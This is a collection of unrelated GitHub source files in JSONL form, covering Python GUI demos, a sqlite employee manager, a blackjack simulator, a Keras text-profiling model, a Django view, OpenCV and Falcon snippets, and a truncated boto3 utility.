+{"seq_id":"26227944692","text":"from tkinter import *\nroot=Tk()\nroot.geometry(\"400x300\")\n\ndef something():\n a.config(text=\"how are you?\")\n root.config(bg=\"grey\")\n b.config(text=\"You have been configged\",state=DISABLED)\n\n# global a\na=Label(root,text=\"Hello everyone\")\na.pack(pady=10)\n\nb=Button(root,text=\"click me!\",command=something)\nb.pack()\nroot.mainloop()","repo_name":"praveenchandra01/Python","sub_path":"Python GUI/Config(8).py","file_name":"Config(8).py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"29895385778","text":"import sqlite3\n\n\nclass ManageCompany:\n def __init__(self):\n self.db = sqlite3.connect(\"company.db\")\n self.db.row_factory = sqlite3.Row\n self.cursor = self.db.cursor()\n self.help_commands = {\n 'quit': 'Exit program',\n 'list_employees': 'List employees (name - possition)',\n 'monthly_spending': 'Company mounthly spendings',\n 'yearly_spending': 'Company yearly spendings',\n 'add_employee': 'Add employee',\n 'delete_employee ': 'Delete employee',\n 'update_employee ': 'Update employee'\n }\n self.available_commands = {\n 'quit': 0,\n 'list_employees': 0,\n 'monthly_spending': 0,\n 'yearly_spending': 0,\n 'add_employee': 0,\n 'delete_employee': 1,\n 'update_employee': 1,\n 'q': 0, 'le': 0, 'ms': 0, 'ys': 0, 
'ae': 0, 'de': 1, 'ee': 1\n }\n self.start()\n\n def ask_for_command(self, prompt=\"command>\"):\n return input(prompt).lower()\n\n # Just a short cut\n def le(self):\n return self.list_employees()\n\n def list_employees(self):\n query = \"SELECT id, name, position FROM employees\"\n result = self.cursor.execute(query).fetchall()\n formated_result = []\n for employee in result:\n formated_result.append(' - '.join([str(x) for x in employee]))\n return formated_result\n\n def _get_monthly_spendings(self):\n query = \"SELECT SUM(monthly_salary) FROM employees\"\n return self.cursor.execute(query).fetchone()[0]\n\n # Just a short cut\n def ms(self):\n return self.monthly_spending()\n\n def monthly_spending(self):\n return \"The company is spending {} every month!\".format(\n self._get_monthly_spendings()\n )\n\n def _get_yearly_spending(self):\n query = \"SELECT SUM(yearly_bonus) FROM employees\"\n early_bonuses = self.cursor.execute(query).fetchone()[0]\n return self._get_monthly_spendings() * 12 + early_bonuses\n\n def _is_sure(self, question):\n question += ' [y/N]'\n answer = self.ask_for_command(question)\n if answer == '' or answer == 'n':\n return False\n elif answer == 'y':\n return True\n else:\n return self._is_sure(question)\n\n # Just a short cut\n def ys(self):\n return self.yearly_spending()\n\n def yearly_spending(self):\n return \"The company is spending {} every year!\".format(\n self._get_yearly_spending()\n )\n\n # Just a short cut\n def ae(self):\n return self.add_employee()\n\n def add_employee(self):\n name = self.ask_for_command('name>')\n while len(name) < 5:\n print(\"Name must be longer than 5 characters\")\n name = self.ask_for_command('name>')\n salary = int(self.ask_for_command('monthly_salary>'))\n while salary <= 0:\n print(\"We don't allow slavery in our company(salary must be > 0)\")\n salary = int(self.ask_for_command('monthly_salary>'))\n bonus = int(self.ask_for_command('yearly_bonus>'))\n while bonus < 0:\n print(\"You can't steal from our employees (yearly_bonus >= 0)\")\n bonus = int(self.ask_for_command('yearly_bonus>'))\n position = self.ask_for_command('position>')\n while len(position) < 2:\n print(\"Position must be longer than 2 characters\")\n position = self.ask_for_command('position>')\n query = \"INSERT INTO employees VALUES(?,?,?,?,?)\"\n self.cursor.execute(query, (None, name, salary, bonus, position))\n return \"Employee added\"\n\n # Just a short cut\n def de(self, employee_id):\n return self.delete_employee(employee_id)\n\n def delete_employee(self, employee_id):\n select_query = \"SELECT name FROM employees WHERE id = ?\"\n try:\n name = self.cursor.execute(select_query, employee_id).fetchone()[0]\n except Exception:\n return \"No such employee id\"\n delete_query = \"DELETE FROM employees WHERE id = ?\"\n question = \"Are you sure you want to delete {}\".format(name)\n if self._is_sure(question):\n self.cursor.execute(delete_query, employee_id)\n return name + \" was deleted\"\n\n # Just a short cut\n def ee(self, employee_id):\n return self.edit_employee(employee_id)\n\n def edit_employee(self, employee_id):\n select_query = \"\"\"SELECT name, monthly_salary, yearly_bonus, position\n FROM employees WHERE id = ?\"\"\"\n try:\n employee = self.cursor.execute(select_query, employee_id).fetchone()\n except Exception:\n return \"No such employee id\"\n update_query = \"UPDATE employees SET {} WHERE id=?\"\n changed = []\n query_updates = {\n 'name': 'name = ?',\n 'salary': 'monthly_salary = ?',\n 'bonus': 'yearly_bonus = ?',\n 'position': 'position = ?'\n }\n 
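# Only fields the user actually changed get a 'col = ?' fragment below; e.g.\n # changed == ['name', 'bonus'] yields \"UPDATE employees SET name = ?, yearly_bonus = ? WHERE id=?\".\n 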
prompt = 'name[{}]>'.format(employee['name'])\n name = self.ask_for_command(prompt)\n while len(name) < 5:\n if name == '':\n name = employee['name']\n break\n else:\n changed.append('name')\n print(\"Name must be longer than 5 characters\")\n name = self.ask_for_command(prompt)\n prompt = 'monthly_salary[{}]>'.format(employee['monthly_salary'])\n salary = self.ask_for_command(prompt)\n if salary == '':\n salary = employee['monthly_salary']\n else:\n salary = int(salary)\n while salary <= 0:\n if salary == '':\n salary = employee['monthly_salary']\n break\n else:\n changed.append('salary')\n print(\"We don't allow slavery in our company(salary must be > 0)\")\n salary = int(self.ask_for_command(prompt))\n prompt = 'yearly_bonus[{}]>'.format(employee['yearly_bonus'])\n bonus = self.ask_for_command(prompt)\n if bonus == '':\n bonus = employee['yearly_bonus']\n else:\n bonus = int(bonus)\n changed.append('bonus')\n while bonus < 0:\n if bonus == '':\n bonus = employee['yearly_bonus']\n break\n else:\n changed.append('bonus')\n print(\"You can't steal from our employees (yearly_bonus >= 0)\")\n bonus = int(self.ask_for_command(prompt))\n prompt = 'position[{}]>'.format(employee['position'])\n position = self.ask_for_command(prompt)\n while len(position) < 2:\n if position == '':\n position = employee['position']\n break\n else:\n changed.append('position')\n print(\"Position must be longer than 2 characters\")\n position = self.ask_for_command(prompt)\n print(changed)\n if len(changed) > 0:\n update_query = update_query.format(', '.join([query_updates[x] for x in changed]))\n return update_query\n else:\n return None\n\n def execute(self, command_with_arg):\n command, arg = command_with_arg\n if arg is not None and self.available_commands[command] != 0:\n result = getattr(self, command)(arg)\n else:\n result = getattr(self, command)()\n if result is None:\n return None\n if type(result) is list or type(result) is tuple:\n for row in result:\n print(row)\n else:\n print(result)\n\n def start(self):\n while True:\n command_with_arg = self.ask_for_command()\n if ' ' in command_with_arg:\n command = command_with_arg.split(' ', 1)\n else:\n command = [command_with_arg, None]\n if command[0] not in self.available_commands:\n print(\"Invalid command use help or ? 
for available commands\")\n elif command[0] == \"quit\" or command[0] == \"q\":\n break\n else:\n # self.execute(command)\n try:\n self.execute(command)\n except TypeError:\n print(\"Missing second argument for {}\".format(command[0]))\n self.db.commit()\n self.db.close()\n\n\nif __name__ == '__main__':\n mc = ManageCompany()\n","repo_name":"nikpet/hb","sub_path":"week7/2/manage_company.py","file_name":"manage_company.py","file_ext":"py","file_size_in_byte":8458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"2671402182","text":"from .player import Player, Dealer\nfrom .inputs import ask_for_another_round\n\nfrom itertools import count\nimport sys\nimport os\n\n\nclass Blackjack():\n\tdef __init__(\n\t\t\tself,\n\t\t\tbankroll,\n\t\t\tbet_unit,\n\t\t\tbet_spread,\n\t\t\tbank_adjustment_resolution,\n\t\t\tpenetration_percentage,\n\t\t\tnumber_of_decks,\n\t\t\tuse_basic_strategy,\n\t\t\tstand_on_soft_17=True,\n\t\t\tcan_double=True,\n\t\t\tcan_double_after_split=True,\n\t\t\tcan_surrender=True,\n\t\t\tnum_players=1\n\t\t\t):\n\t\tself.players = []\n\t\tself.y_axis_average = []\n\t\tfor x in range(num_players):\n\t\t\tself.players.append(\n\t\t\t\tPlayer(\n\t\t\t\t\tbankroll=bankroll,\n\t\t\t\t\tbet_unit=bet_unit,\n\t\t\t\t\tbet_spread=bet_spread,\n\t\t\t\t\tbank_adjustment_resolution=bank_adjustment_resolution,\n\t\t\t\t\tuse_basic_strategy=use_basic_strategy,\n\t\t\t\t\tstand_on_soft_17=stand_on_soft_17,\n\t\t\t\t\tcan_double=True,\n\t\t\t\t\tcan_double_after_split=True,\n\t\t\t\t\tcan_surrender=True,\n\t\t\t\t\tname=x+1\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\tif x == 0 and use_basic_strategy is False:\n\t\t\t\tuse_basic_strategy = True\n\n\t\tself.dealer = Dealer(\n\t\t\tstand_on_soft_17=stand_on_soft_17,\n\t\t\tpenetration_percentage=penetration_percentage,\n\t\t\tnumber_of_decks=number_of_decks,\n\t\t\t)\n\n\n\tdef bets(self):\n\t\tfor player in self.players:\n\t\t\tif not player.bankrupt:\n\t\t\t\tplayer.make_a_bet()\n\n\n\tdef initial_deal(self):\n\t\tdealer_upcard = self.dealer.hit()\n\t\tfor player in self.players:\n\t\t\tif not player.bankrupt:\n\t\t\t\tplayer.dealer_upcard = dealer_upcard\n\t\t\t\tplayer.hit()\n\n\n\tdef log_hands(self):\n\t\tself.dealer.log_hand()\n\t\tfor person in self.players:\n\t\t\tperson.log_hand()\n\n\n\tdef make_moves(self):\n\t\tfor player in self.non_bankrupt_players():\n\t\t\tplayer.move()\n\t\tif (not self.all_players_bust() and not self.all_players_surrender()) or self.valid_splits_present():\n\t\t\tself.dealer.move()\n\t\telse:\n\t\t\tself.dealer.reveal_card()\n\n\n\tdef non_bankrupt_players(self):\n\t\treturn list(filter(lambda player: player.bankrupt is False, self.players))\n\n\n\tdef all_players_bust(self):\n\t\tbusts = [player.busts for player in self.players]\n\t\treturn all(busts)\n\n\n\tdef all_players_surrender(self):\n\t\tsurrenders = [player.surrendered for player in self.players]\n\t\treturn all(surrenders)\n\n\tdef valid_splits_present(self):\n\t\tvalids = []\n\t\tfor player in self.players:\n\t\t\tvalids.append(player.valid_splits())\n\t\treturn any(valids)\n\n\n\tdef get_no_bust_unsurrendered_players(self):\n\t\treturn filter(\n\t\t\tlambda player: (player.busts is False and player.surrendered is False) or player.valid_splits(),\n\t\t\tself.non_bankrupt_players()\n\t\t\t)\n\n\n\tdef next_round_check(self):\n\t\tif not self.players_broke() and (self.players[0].use_basic_strategy or self.manual_round_check()):\n\t\t\tself.new_round()\n\t\t\treturn True\n\n\n\tdef 
players_broke(self):\n\t\tbroke = [player.bankroll < 1 for player in self.players]\n\t\treturn all(broke)\n\n\n\tdef manual_round_check(self):\n\t\tanswer = ask_for_another_round()\n\t\tif answer.startswith('y') or answer == '':\n\t\t\treturn True\n\t\telse:\n\t\t\tprint('Bye.')\n\n\n\tdef new_round(self):\n\t\tprint('New round')\n\t\tself.dealer.new_hand()\n\t\tfor player in self.players:\n\t\t\tplayer.new_hand(hard=True)\n\n\n\tdef average(self):\n\t\taverage = round(sum([ player.bankroll for player in self.players]) / len(self.players))\n\t\tself.y_axis_average.append(average)\n\n\n\tdef update_axes(self):\n\t\tfor player in self.players:\n\t\t\tplayer.update_y_axis()\n\n\n\tdef game(self):\n\t\tif self.non_bankrupt_players():\n\t\t\tself.bets()\n\t\t\tself.initial_deal()\n\t\t\tself.log_hands()\n\t\t\tself.make_moves()\n\t\t\tself.dealer.compare_players(self.get_no_bust_unsurrendered_players())\n\t\t\tself.next_round_check()\n\t\t\t# print(self.dealer.shoe.shoe)\n\t\tself.update_axes()\n\n\ndef main(\n\tbankroll,\n\tbet_unit,\n\tbet_spread,\n\tbank_adjustment_resolution,\n\tuse_basic_strategy,\n\tpenetration_percentage,\n\tnumber_of_decks,\n\tstand_on_soft_17,\n\tcan_double,\n\tcan_double_after_split,\n\tcan_surrender,\n\tnum_players,\n\tgame_interval,\n\tspeed_ms,\n\tanimate=False,\n\tdebug=False\n\t):\n\n\tbkjk = Blackjack(\n\t\tbankroll=bankroll,\n\t\tbet_unit=bet_unit,\n\t\tbet_spread=bet_spread,\n\t\tbank_adjustment_resolution=bank_adjustment_resolution,\n\t\tuse_basic_strategy=use_basic_strategy,\n\t\tnum_players=num_players,\n\t\tpenetration_percentage=penetration_percentage,\n\t\tnumber_of_decks=number_of_decks\n\t\t)\n\tplyr = bkjk.players[0]\n\n\tif not debug:\n\t\tblockPrint()\n\n\tx_axis = []\n\tx = count()\n\tx_axis.append(next(x))\n\tbkjk.average()\n\tcolors = ['#0099ee', '#dd0022']\n\n\tdef progress_rounds():\n\t\tfor y in range(game_interval):\n\t\t\tx_axis.append(next(x))\n\t\t\tbkjk.game()\n\t\t\tbkjk.average()\n\n\twhile len(x_axis) < 2000:\n\t\tprogress_rounds()\n\n\treturn [p.y_axis for p in bkjk.players]\n\n\ndef blockPrint():\n\tsys.stdout = open(os.devnull, 'w')\n\n\nif __name__ == '__main__':\n\tmain(\n\t\tbankroll=1000,\n\t\tbet_unit=20,\n\t\tbank_adjustment_resolution=20,\n\t\tbet_spread=12,\n\t\tuse_basic_strategy=True,\n\t\tpenetration_percentage=70,\n\t\tnumber_of_decks=8,\n\t\tstand_on_soft_17=True,\n\t\tcan_double=True,\n\t\tcan_double_after_split=True,\n\t\tcan_surrender=True,\n\t\tnum_players=6,\n\t\tgame_interval=50,\n\t\tspeed_ms=250,\n\t\tdebug=True,\n\t\tanimate=True\n\t\t)\n\n","repo_name":"ZFudge/blackjack_sim","sub_path":"blackjack/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"4922760082","text":"import numpy as np\nimport pandas as pd\nimport os\nimport json\nfrom sklearn.preprocessing import MultiLabelBinarizer\nimport keras\nfrom keras.layers import Conv1D, MaxPool1D, LSTM, Dropout, Dense\nfrom keras.models import Sequential\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\nfrom sklearn.base import BaseEstimator\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.externals import joblib\nfrom uuid import uuid4\n\n\nclass MorphVectorizer(BaseEstimator):\n def __init__(self, sep=\"|\"):\n self.morph_enc = MultiLabelBinarizer()\n self.sep = sep\n\n def fit(self, X, y=None):\n l_x_tags = []\n for doc in X:\n for sent in doc[\"sentences\"]:\n for word in sent:\n word_morph = 
[word[\"pos\"]] + word[\"grm\"].split(self.sep)\n l_x_tags.append(word_morph)\n self.morph_enc.fit(l_x_tags)\n\n def transform(self, X, y=None):\n l_docs = []\n for doc in X:\n l_doc = []\n for sent in doc[\"sentences\"]:\n for word in sent:\n word_morph = [word[\"pos\"]] + word[\"grm\"].split(self.sep)\n l_doc.append(word_morph)\n arr_doc = self.morph_enc.transform(l_doc)\n l_docs.append(arr_doc)\n\n max_doc_len = max([doc.shape[0] for doc in l_docs])\n word_dim = len(self.morph_enc.classes_)\n for doc_ind, doc in enumerate(l_docs):\n doc_padded = np.zeros((max_doc_len, word_dim))\n doc_padded[:len(doc)] = doc\n l_docs[doc_ind] = np.array(doc_padded, copy=True)\n\n l_docs = np.array(l_docs)\n return l_docs\n\n def fit_transofrm(self, X, y=None):\n self.fit(X, y)\n return self.transform(X, y)\n\n\nclass NNModelSimple(BaseEstimator):\n def __init__(self, model_path, batch_size=32):\n self.y_label_enc = MultiLabelBinarizer()\n self.morph_enc = MorphVectorizer()\n self.model = Sequential()\n self.model_path = model_path\n self.batch_size = batch_size\n self.h = keras.callbacks.History\n\n def fit(self, X, y):\n # Для разделения на тренировочное и валидационное множества по ID пользователя\n user_ids = []\n for doc in X:\n doc_user_id = doc[\"meta\"].get(\"user_id\", str(uuid4()))\n if \"user_id\" not in doc[\"meta\"]:\n doc[\"meta\"][\"user_id\"] = doc_user_id\n user_ids.append(doc_user_id)\n\n tr_user_ids, vl_user_ids = train_test_split(np.unique(user_ids), train_size=0.9, test_size=0.1)\n\n y = np.array([str(val) for val in y])\n self.y_label_enc.fit(y)\n self.morph_enc.fit(X)\n X = np.array(X)\n\n X_tr = np.array([doc for doc, user_id in zip(X, user_ids) if user_id in tr_user_ids])\n X_vl = np.array([doc for doc, user_id in zip(X, user_ids) if user_id in vl_user_ids])\n y_tr = np.array([doc for doc, user_id in zip(y, user_ids) if user_id in tr_user_ids])\n y_vl = np.array([doc for doc, user_id in zip(y, user_ids) if user_id in vl_user_ids])\n y_tr_enc = self.y_label_enc.transform(y_tr)\n y_vl_enc = self.y_label_enc.transform(y_vl)\n\n self.model = self.keras_model(len(self.y_label_enc.classes_), len(self.morph_enc.morph_enc.classes_))\n save_model = ModelCheckpoint(os.path.join(self.model_path, \"model.hdf5\"), save_best_only=True)\n early_stop = EarlyStopping(patience=30)\n self.h = self.model.fit_generator(self.batch_gen(X_tr, y_tr_enc), self.get_n_steps(len(X_tr), self.batch_size),\n validation_data=self.batch_gen(X_vl, y_vl_enc),\n validation_steps=self.get_n_steps(len(X_vl), self.batch_size),\n verbose=1, epochs=300, callbacks=[save_model, early_stop]).history\n return self\n\n def save_model(self, model_path):\n joblib.dump(self.y_label_enc, os.path.join(model_path, \"y_label_enc.pkl\"))\n joblib.dump(self.morph_enc, os.path.join(model_path, \"morph_enc.pkl\"))\n d_model_params = {}\n for k, v in self.__dict__.items():\n if k not in [\"y_label_enc\", \"morph_enc\", \"model\"]:\n d_model_params[k] = v\n with open(os.path.join(model_path, \"model_params.json\"), \"w\") as f:\n return json.dump(d_model_params, f)\n\n def load_model(self, model_path):\n with open(os.path.join(model_path, \"model_params.json\"), \"r\") as f:\n d_model_params = json.load(f)\n for k, v in d_model_params.items():\n self.k = v\n self.y_label_enc = joblib.load(os.path.join(model_path, \"y_label_enc.pkl\"))\n self.morph_enc = joblib.load(os.path.join(model_path, \"morph_enc.pkl\"))\n self.model = keras.models.load_model(os.path.join(model_path, \"model.hdf5\"))\n return self\n\n def predict(self, X, y=None):\n 
X = np.array(X)\n pred = self.model.predict_generator(self.batch_gen(X, None),\n steps=self.get_n_steps(len(X), self.batch_size),\n verbose=1)\n res = np.zeros(pred.shape)\n val_ind = 0\n for val in pred:\n res[val_ind, np.argmax(val)] = 1.\n val_ind += 1\n res = self.y_label_enc.inverse_transform(res)\n res = np.array([val[0] for val in res])\n return res\n\n def batch_gen(self, X, y=None, batch_size=32, shuffle=False):\n inds = np.arange(0, len(X))\n while True:\n if shuffle:\n np.random.shuffle(inds)\n\n for start_ind in np.arange(0, len(inds), batch_size):\n batch_inds = inds[start_ind:start_ind + batch_size]\n x_batch = X[batch_inds]\n x_batch_enc = self.morph_enc.transform(x_batch)\n if y is not None:\n y_batch = y[batch_inds]\n yield x_batch_enc, y_batch\n else:\n yield x_batch_enc\n\n @staticmethod\n def get_n_steps(seq_len, batch_size=32):\n res = int(seq_len/batch_size)\n if seq_len % batch_size != 0:\n res += 1\n return res\n\n @staticmethod\n def keras_model(out_dim, tags_dim):\n model_hidden = Sequential()\n model_hidden.add(Conv1D(128, 2, activation=\"relu\", padding=\"same\", input_shape=[None, tags_dim]))\n model_hidden.add(MaxPool1D(2, padding=\"same\"))\n model_hidden.add(Conv1D(128, 2, activation=\"relu\", padding=\"same\"))\n model_hidden.add(MaxPool1D(2, padding=\"same\"))\n model_hidden.add(Conv1D(128, 2, activation=\"relu\", padding=\"same\"))\n model_hidden.add(MaxPool1D(2, padding=\"same\"))\n model_hidden.add(LSTM(128))\n\n model = Sequential()\n model.add(model_hidden)\n model.add(Dropout(0.5))\n model.add(Dense(out_dim, activation=\"softmax\"))\n\n model.compile(\"adam\", \"mse\", metrics=[\"accuracy\"])\n\n return model","repo_name":"sag111/author_gender_and_age_profiling_with_style_imitation_detection","sub_path":"NNModel_simple.py","file_name":"NNModel_simple.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"21873684881","text":"from django.shortcuts import render\r\nfrom appOne import forms\r\n# Create your views here.\r\ndef StudentFormView(request):\r\n form = forms.StudentForm()\r\n if request.method == 'POST':\r\n data = forms.StudentForm(request.POST)\r\n if data.is_valid():\r\n print('form is valid')\r\n print('StudentName',data.cleaned_data['StudentName'])\r\n print('mail',data.cleaned_data['StudentEmail'])\r\n print('location',data.cleaned_data['StudentLocation'])\r\n print('Mobilenumber',data.cleaned_data['StudentMobile'])\r\n return render(request, 'template/form.html',{'form':form})\r\n","repo_name":"Mani015/python-11am-batch","sub_path":"DJANGO-RTP/project7-forms/appOne/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"39"} +{"seq_id":"30838351986","text":"import cv2\nimport random\nimport numpy as np\n\nimage = cv2.imread(\"../resource/coffee.jpg\")\n(rows, cols, planes) = np.shape( image )\ncenter = (cols // 2, rows // 2)\n\nmatrix = cv2.getRotationMatrix2D(center, 45, 1)\nrotation = cv2.warpAffine(image, matrix, (cols, rows))\n\ncv2.imshow( \"Original\", image )\ncv2.imshow( \"Rotation\", rotation )\n\ncv2.waitKey(0)","repo_name":"filipeoliveirabr/hands-on-cv","sub_path":"03 - Pixel Manipulation & Geometry/image_transformations_rotation.py","file_name":"image_transformations_rotation.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} 
+{"seq_id":"73430781235","text":"def customer():\n import PySimpleGUI as sg\n import mysql.connector as sql\n import matplotlib.pyplot as plt\n\n conn = sql.connect(host='localhost', user='root', passwd='123456', database='BANK_DBMS')\n cur = conn.cursor()\n\n query = \"SELECT Name,acc_no,login_pin FROM customer_login\"\n cur.execute(query)\n results = cur.fetchall()\n\n sg.theme('DarkAmber') # Add a touch of color\n # All the stuff inside your window.\n layout = [[sg.Image('Untitledlogo.png',expand_x=True, expand_y=True )],\n [sg.Text('Account Holder Name',key = 'ACC'), sg.InputText()],\n [sg.Text('Account Number'), sg.InputText()],\n [sg.Text('Pin'), sg.InputText()],\n [sg.Button('Login'), sg.Button('Cancel'),sg.Button('Details'),sg.Button('Analysis')]]\n\n # Create the Window\n window = sg.Window('Customer GUI', layout,keep_on_top=True)\n # Event Loop to process \"events\" and get the \"values\" of the inputs\n while True:\n event, values = window.read()\n values = tuple(values.values())\n values = (values[0], int(values[1]), int(values[2]))\n print(values, results)\n if event == sg.WIN_CLOSED or event == 'Cancel': # if user closes window or clicks cancel\n break\n if (values[0], values[1], values[2]) in results:\n print(\"Authentication successful\")\n if event == 'Details':\n account_number = values[1]\n q2 = \"SELECT money FROM customer_login where acc_no =\" + str(account_number)\n cur.execute(q2)\n r2 = cur.fetchall()\n sg.popup_scrolled(\"Account Holder Name --->\"+str(values[0]),\"\\nAccount Number --->\"+str(values[1]),\"\\nCurrent Account Balance--->\"+str(r2),size=(300, 10))\n else:\n sg.popup_auto_close(\"Welcome\")\n if event == 'Analysis':\n # x axis values\n x = [1, 2, 3]\n # corresponding y axis values\n y = [2, 4, 1]\n\n # plotting the points\n plt.plot(x, y)\n\n # naming the x axis\n plt.xlabel('x - axis')\n # naming the y axis\n plt.ylabel('y - axis')\n\n # giving a title to my graph\n plt.title('This Analysis Feature is under development')\n\n # function to show the plot\n plt.show()\n sg.popup_auto_close('This Graph is only for example')\n else:\n print(\"Authentication failed\")\n event = sg.WIN_CLOSED\n break\n\n window.close()\n","repo_name":"naman520/bank_dbms","sub_path":"Main/main files/final_account.py","file_name":"final_account.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27505420308","text":"#!/usr/bin/python3\n\nimport json\nimport falcon\n\nfrom lib.const import Version, Message\nfrom lib.utility import SystemUtility, DocumentUtility, CustomJSONEncoder\nfrom lib.resource import BaseJsonApiResource\n\n\nclass OsLogApiResource(BaseJsonApiResource):\n def on_get(self, req, resp, hostname, resource, from_date, to_date):\n resp.status = falcon.HTTP_200\n body = SystemUtility.get_response_base_with_body(Version.VERSION_1)\n doc_db = DocumentUtility.get_document()\n if resource == 'cpu':\n data = doc_db.searchCpuLog(hostname, from_date, to_date)\n body['data']['data'] = list(map(lambda x: {'timestamp': x['timestamp'], 'ratio': x['cpu']['ratio'], 'user': x['cpu']['user'], 'sys': x['cpu']['sys'], 'idle': x['cpu']['idle'], 'wait': x['cpu']['wait'], 'steal': x['cpu']['steal']}, data))\n body['data']['key'] = ['user', 'sys', 'idle', 'wait', 'steal']\n self.logger.debug(str(data))\n elif resource == 'memory':\n data = doc_db.searchMemoryLog(hostname, from_date, to_date)\n body['data']['data'] = list(map(lambda x: {'timestamp': x['timestamp'], 'ratio': 
x['memory']['ratio'], 'free': x['memory']['free'], 'buff': x['memory']['buff'], 'cache': x['memory']['cache']}, data))\n body['data']['key'] = ['free', 'buff', 'cache']\n self.logger.debug(str(data))\n elif resource == 'swap':\n data = doc_db.searchSwapLog(hostname, from_date, to_date)\n body['data']['data'] = list(map(lambda x: {'timestamp': x['timestamp'], 'swapped': x['memory']['swapped']}, data))\n body['data']['key'] = ['swapped']\n self.logger.debug(str(data))\n elif resource == 'storage':\n data = doc_db.searchStorageLog(hostname, from_date, to_date)\n index = {}\n key = {}\n for i in data:\n try:\n index[i['timestamp']][i['storage']['mounted_path']] = i['storage']['ratio']\n except KeyError:\n index[i['timestamp']] = {i['storage']['mounted_path']: i['storage']['ratio']}\n key[i['storage']['mounted_path']] = True\n body['data']['data'] = list(map(lambda x: {'timestamp': x[0], **x[1]}, index.items()))\n body['data']['key'] = list(key.keys())\n self.logger.debug(str(data))\n elif resource == 'diskio':\n data = doc_db.searchIoLog(hostname, from_date, to_date)\n body['data']['data'] = list(map(lambda x: {'timestamp': x['timestamp'], 'block_in': x['io']['block_in'], 'block_out': x['io']['block_out']}, data))\n body['data']['key'] = ['block_in', 'block_out']\n self.logger.debug(str(data))\n elif resource == 'network':\n pass\n else:\n resp.status = falcon.HTTP_400\n SystemUtility.set_response_metadata(Version.VERSION_1, body, Message.RESPONSE_NG, Message.RESPONSE_REQUEST_URL_ERROR)\n\n resp.body = json.dumps(body, cls=CustomJSONEncoder)\n","repo_name":"kuro2a/kiku","sub_path":"lib/resource/api/OsLogApiResource.py","file_name":"OsLogApiResource.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"12062813725","text":"# Initial state of boxes\nboxes = {\n 0: ['desert', 'book', 'toothbrush', 'sculpture'],\n 1: ['microwave', 'flower', 'boat', 'magnet'],\n 2: ['seaweed', 'submarine'],\n 3: ['card'],\n 4: [],\n 5: ['butterfly', 'console', 'telescope'],\n 6: ['wig', 'helmet', 'fish'],\n 7: ['elephant', 'sandals', 'beach', 'necklace'],\n 8: ['mixer'],\n 9: ['ocean', 'lipstick', 'zipper', 'usb', 'soap'],\n 10: ['button', 'scissors', 'river', 'puzzle', 'oven']\n}\n\n# Replace the sandals and the elephant with the puzzle and the pants in Box 7.\nboxes[7].remove('sandals')\nboxes[7].remove('elephant')\nboxes[7].append('puzzle')\nboxes[7].append('pants')\n\n# Remove the puzzle and the beach and the pants from Box 7.\nitems_to_remove = ['puzzle', 'beach', 'pants']\nfor item in items_to_remove:\n boxes[7].remove(item)\n\n# Swap the fish in Box 6 with the soap in Box 9.\nboxes[6].remove('fish')\nboxes[9].remove('soap')\nboxes[6].append('soap')\nboxes[9].append('fish')\n\n# Replace the sculpture and the desert with the hat and the shirt in Box 0.\nboxes[0].remove('sculpture')\nboxes[0].remove('desert')\nboxes[0].append('hat')\nboxes[0].append('shirt')\n\n# Move the card from Box 3 to Box 1.\nboxes[3].remove('card')\nboxes[1].append('card')\n\n# Put the flower into Box 5.\nboxes[5].append('flower')\n\n# Remove the hat and the shirt and the book from Box 0.\nitems_to_remove = ['hat', 'shirt', 'book']\nfor item in items_to_remove:\n boxes[0].remove(item)\n\n# Replace the toothbrush with the plane in Box 0.\nboxes[0].remove('toothbrush')\nboxes[0].append('plane')\n\n# Swap the plane in Box 0 with the card in Box 
1.\nboxes[0].remove('plane')\nboxes[1].remove('card')\nboxes[0].append('card')\nboxes[1].append('plane')\n\n# Move the submarine and the seaweed from Box 2 to Box 7.\nitems_to_move = ['submarine', 'seaweed']\nfor item in items_to_move:\n boxes[2].remove(item)\n boxes[7].append(item)\n\n# Move the card from Box 0 to Box 9.\nboxes[0].remove('card')\nboxes[9].append('card')\n\n# Remove the soap and the wig from Box 6.\nboxes[6].remove('soap')\nboxes[6].remove('wig')\n\n# Replace the puzzle with the beach in Box 10.\nboxes[10].remove('puzzle')\nboxes[10].append('beach')\n\n# Put the wig into Box 0.\nboxes[0].append('wig')\n\n# Put the table and the crown into Box 8.\nboxes[8].append('table')\nboxes[8].append('crown')\n\n# Move the magnet and the boat and the flower from Box 1 to Box 10.\nitems_to_move = ['magnet', 'boat', 'flower']\nfor item in items_to_move:\n boxes[1].remove(item)\n boxes[10].append(item)\n\n# Swap the beach in Box 10 with the helmet in Box 6.\nboxes[10].remove('beach')\nboxes[6].remove('helmet')\nboxes[10].append('helmet')\nboxes[6].append('beach')\n\n# Print the boxes\nfor box_number, items in boxes.items():\n print(f\"Box {box_number}: {items}\")","repo_name":"NLP-KU/fulgid","sub_path":"boxes/results/complex-boxes-dataset/code/gpt-3.5-turbo/ba12d63581.py","file_name":"ba12d63581.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"20868872887","text":"import logging\nimport os\nimport time\n\nimport boto3\nimport ipaddr\nfrom botocore import config\nfrom botocore.exceptions import ClientError\nfrom util.exception import APIException\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\nsolution_version = os.environ.get('SOLUTION_VERSION', 'v1.0.0')\nsolution_id = os.environ.get('SOLUTION_ID', 